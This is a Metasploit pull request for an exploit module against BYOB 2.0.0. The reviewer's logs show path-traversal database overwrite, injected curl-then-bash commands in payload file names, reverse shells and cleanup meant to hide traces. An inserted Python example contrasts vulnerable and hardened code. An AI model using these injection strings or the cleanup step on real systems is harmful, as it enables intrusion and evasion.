
Add BYOB Unauthenticated RCE module (CVE-2024-45256, CVE-2024-45257) #19485

Merged, 8 commits, Oct 15, 2024

Conversation

Chocapikk (Contributor)

Hello Metasploit Team,

I hope this message finds you well.

I am submitting a new module that exploits two critical vulnerabilities identified in BYOB (Build Your Own Botnet) v2.0.0. These vulnerabilities include an Unauthenticated Arbitrary File Write (CVE-2024-45256) and an Authenticated Command Injection (CVE-2024-45257), which allow attackers to bypass authentication and achieve Remote Code Execution (RCE). The latest BYOB version still remains vulnerable as of today.

Module Overview:

  1. Arbitrary File Write: The exploit takes advantage of the file upload feature to overwrite the SQLite database, allowing the creation of a new admin user without authentication.
  2. Command Injection: After gaining admin privileges, it leverages a command injection vulnerability in the payload generation feature to execute arbitrary commands.

Testing:

This module has been tested against BYOB version 2.0.0 on a Linux Mint environment running Python 3.10.12.

Verification Steps:

  1. Start the Metasploit console
  2. Use the module: exploit/unix/webapp/byob_unauth_rce
  3. Set the target information, including RHOST, RPORT, etc.
  4. Run the exploit, and a reverse shell will be triggered on successful exploitation.

Thank you for reviewing this contribution. Looking forward to your feedback!
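As an added example (not code from the PR, the Metasploit module, or BYOB; the function names, the upload root and the pyinstaller argv are hypothetical), here are the two bug classes the module overview describes, each next to a hardened form: an upload destination built from the client-supplied filename, which is how a path like the `/proc/self/cwd/...` one in the session logs reaches the database, and a build command assembled from the client-supplied payload name, which is how `$(...)`/`$IFS` sequences end up in the generated file names.

```python
"""Added example: the two bug classes named in the module overview, each next
to a hardened form. Not code from BYOB or from the Metasploit module; the
function names, UPLOAD_DIR and the pyinstaller argv are hypothetical."""
import posixpath
import re
import subprocess

UPLOAD_DIR = "/srv/app/uploads"                   # assumed upload root
PAYLOAD_NAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,64}")

# --- 1. arbitrary file write through a client-supplied filename -------------

def vulnerable_upload_path(filename: str) -> str:
    # join() drops UPLOAD_DIR entirely when filename is absolute, and keeps
    # ".." segments, so "/proc/self/cwd/../../x" lands wherever the client
    # says; this is the shape of the path in the session logs.
    return posixpath.join(UPLOAD_DIR, filename)


def resolve_upload_path(filename: str, upload_dir: str = UPLOAD_DIR):
    """Destination for an uploaded file, or None if it would leave upload_dir."""
    if not filename or "/" in filename or "\x00" in filename:
        return None                       # no separators, no NUL truncation
    root = posixpath.normpath(upload_dir)
    candidate = posixpath.normpath(posixpath.join(root, filename))
    # normpath is lexical: "." and ".." are collapsed without touching disk,
    # so "." and ".." themselves are caught here as well.
    if posixpath.dirname(candidate) != root:
        return None
    # In real code also compare os.path.realpath() results, because a symlink
    # inside upload_dir can still point outside it.
    return candidate

# --- 2. command injection through a client-supplied payload name ------------

def vulnerable_build_command(name: str) -> str:
    # A string handed to a shell: "$(...)", "$IFS" and "&&" inside the name
    # are interpreted, which is what the file names in the listing show.
    return f"pyinstaller --onefile --name {name} client.py"


def is_safe_payload_name(name: str) -> bool:
    return PAYLOAD_NAME_RE.fullmatch(name) is not None


def build_payload_argv(name: str) -> list:
    """argv for subprocess.run(..., shell=False); raises on an unsafe name."""
    if not is_safe_payload_name(name):
        raise ValueError("unsafe payload name: %r" % name)
    # A list goes to execve unchanged: no shell parses it, so the name is one
    # argument even if the allow-list were ever loosened.
    return ["pyinstaller", "--onefile", "--name", name, "client.py"]


def run_payload_build(name: str) -> subprocess.CompletedProcess:
    return subprocess.run(build_payload_argv(name), shell=False, check=True)


if __name__ == "__main__":
    evil = "/proc/self/cwd/../../../../buildyourownbotnet/database.db"
    print(vulnerable_upload_path(evil))      # escapes the upload root
    print(resolve_upload_path(evil))         # None: rejected
    # constructed name, same shape as the ones in the reviewer's listing
    injected = "byob_nix$(curl$IFS-s$IFShttp://192.0.2.10:5000/x)_amd64"
    print(vulnerable_build_command(injected))
    print(is_safe_payload_name(injected), build_payload_argv("byob_nix_amd64_jA7"))
```

The two fixes are independent: the allow-list stops the name from carrying shell syntax, and passing an argv list means that even a name that slipped through would be a single argument rather than something a shell re-parses.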

@Chocapikk (Contributor, Author) left a comment

The changes are as follows

@dledda-r7 (Contributor)

Hello @Chocapikk,
I was able to get a meterpreter session.
I noticed there is an error when trying to restore the database:

msf6 exploit(unix/webapp/byob_unauth_rce) > 
[*] Started reverse TCP handler on 172.24.233.241:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be BYOB.
[+] The target is vulnerable.
[*] Using URL: http://172.24.233.241:5000/Cog3o8Zj
[*] Payload is ready at /
[*] Generating malicious SQLite database.
[+] Malicious database uploaded successfully to the following paths: /proc/self/cwd/buildyourownbotnet/database.db
[*] Registering a new admin user: admin:Yed8EEY36Cui
[+] Registered user!
[*] Logging in with the new admin user.
[+] Logged in successfully!
[*] Injecting payload via command injection.
[*] Received request at: / - Client Address: 172.24.236.224
[*] Sending response to 172.24.236.224 for /
[*] Sending stage (3045380 bytes) to 172.24.236.224
[*] Restoring the database via Meterpreter to avoid leaving traces.
[-] Failed to restore the database: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: 1
[-] Failed to restore the database on all attempted paths.
[*] Meterpreter session 1 opened (172.24.233.241:4444 -> 172.24.236.224:34012) at 2024-10-10 06:27:32 -0400

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > ls
Listing: /home/user/byob/web-gui/buildyourownbotnet/output/admin/src
====================================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100664/rw-rw-r--  116   fil   2024-10-10 06:27:29 -0400  .HiFR
100775/rwxrwxr-x  250   fil   2024-10-10 06:27:29 -0400  OOjsaEAQzBVK
100664/rw-rw-r--  343   fil   2024-10-10 06:27:29 -0400  byob_nix$([email protected]:5000$IFS-o$IFS.HiFR&&bash$IFS.HiFR)_amd64_jA7.py
100664/rw-rw-r--  1320  fil   2024-10-10 06:27:29 -0400  byob_nix$([email protected]:5000$IFS-o$IFS.HiFR&&bash$IFS.HiFR)_amd64_jA7.spec
100664/rw-rw-r--  621   fil   2024-10-10 06:27:29 -0400  requirements.txt

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 172.24.236.224
OS           : LinuxMint 21.3 (Linux 5.15.0-91-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

@dledda-r7 (Contributor) left a comment

OK, I've retested after the changes; looks good to me.

msf6 exploit(unix/webapp/byob_unauth_rce) > 
[*] Fetch handler listening on 172.26.52.39:8080
[*] HTTP server started
[*] Adding resource /byobfetch
[*] Started reverse TCP handler on 172.26.52.39:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be BYOB.
[+] The target is vulnerable.
[*] Using URL: http://172.26.52.39:5000/rmTHGJSSF7
[*] Payload is ready at /
[*] Generating malicious SQLite database.
[+] Malicious database uploaded successfully to the following paths: /proc/self/cwd/../../../../buildyourownbotnet/database.db
[*] Registering a new admin user: admin:SsOOH3Tuk9dD
[+] Registered user!
[*] Logging in with the new admin user.
[+] Logged in successfully!
[*] Injecting payload via command injection.
[*] Received request at: / - Client Address: 172.26.60.213
[*] Sending response to 172.26.60.213 for /
[*] Client 172.26.60.213 requested /byobfetch
[*] Sending payload to 172.26.60.213 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.26.60.213
[*] Restoring the database via Meterpreter to avoid leaving traces.
[+] Database has been successfully restored to its clean state.
[*] Meterpreter session 1 opened (172.26.52.39:4444 -> 172.26.60.213:60774) at 2024-10-14 08:14:50 -0400

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions

Active sessions
===============

  Id  Name  Type                   Information           Connection
  --  ----  ----                   -----------           ----------
  1         meterpreter x64/linux  user @ 172.26.60.213  172.26.52.39:4444 -> 172.26.60.213:60774 (172.26.60.213)

msf6 exploit(unix/webapp/byob_unauth_rce) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer     : 172.26.60.213
OS           : LinuxMint 21.3 (Linux 5.15.0-91-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Oct 15, 2024
@dledda-r7 dledda-r7 merged commit 9a245e6 into rapid7:master Oct 15, 2024
37 checks passed
@dledda-r7 (Contributor)

Release Notes

This adds an exploit module for BYOB unauthenticated RCE (CVE-2024-45256, CVE-2024-45257)

Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)